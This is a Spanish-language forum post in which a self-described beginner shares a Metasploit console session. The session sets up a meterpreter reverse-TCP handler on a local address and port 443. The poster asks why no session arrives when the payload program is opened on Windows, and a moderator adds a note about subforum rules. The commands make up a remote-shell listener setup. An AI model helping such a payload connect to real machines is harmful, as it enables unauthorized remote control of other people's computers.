msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.1.3
LHOST => 192.168.1.3
msf exploit(handler) > set LPORT 443
LPORT => 443
msf exploit(handler) > show options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.1.3 yes The listen address
LPORT 443 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
msf exploit(handler) > exploit
- Exploit running as background job.
- Started reverse TCP handler on 192.168.1.3:443
y hasta alli queda, no se si tengo algo malo, y me puedan corregir?
tambien,anteriormente, no funcionaba el payload cuando se abria el programa en windows, se quedaba atascado en esto:
msf exploit(handler) > exploit
- Exploit running as background job.
- Started reverse TCP handler on 192.168.1.3:443
PD: Soy nuevo en esto.
· Los temas van en su respectivo subforo
>aquí las reglas del foro
-Engel Lex